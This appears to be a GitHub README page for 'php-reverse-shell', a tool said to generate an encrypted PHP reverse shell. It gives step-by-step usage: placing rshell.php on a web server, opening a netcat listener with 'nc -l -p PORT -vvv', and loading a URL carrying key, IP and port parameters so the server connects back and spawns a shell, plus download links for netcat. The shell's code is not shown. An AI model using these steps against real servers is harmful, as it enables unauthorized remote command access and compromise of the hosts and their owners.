Skip to content

Latest commit

 

History

History
42 lines (18 loc) · 594 Bytes

README.md

File metadata and controls

42 lines (18 loc) · 594 Bytes

php-reverse-shell

Generates an encrypted reverse shell implementation in PHP

install: copy rshell.php to your server

run

http://localhost/rshell/rshell.php

on your client machine run

win32: nc -l -p PORT -vvv

http://joncraton.org/files/nc111nt.zip

else: netcat -l -p PORT -vvv

http://internap.dl.sourceforge.net/sourceforge/netcat/netcat-0.7.1.tar.gz

then query a connect...

http://localhost/rshell/SHELLNAME.php?key=KEY&ip=YOURIP&port=PORT

after the tunnel is created and the shell deamon is spawned close the browser window.

thats pretty much it...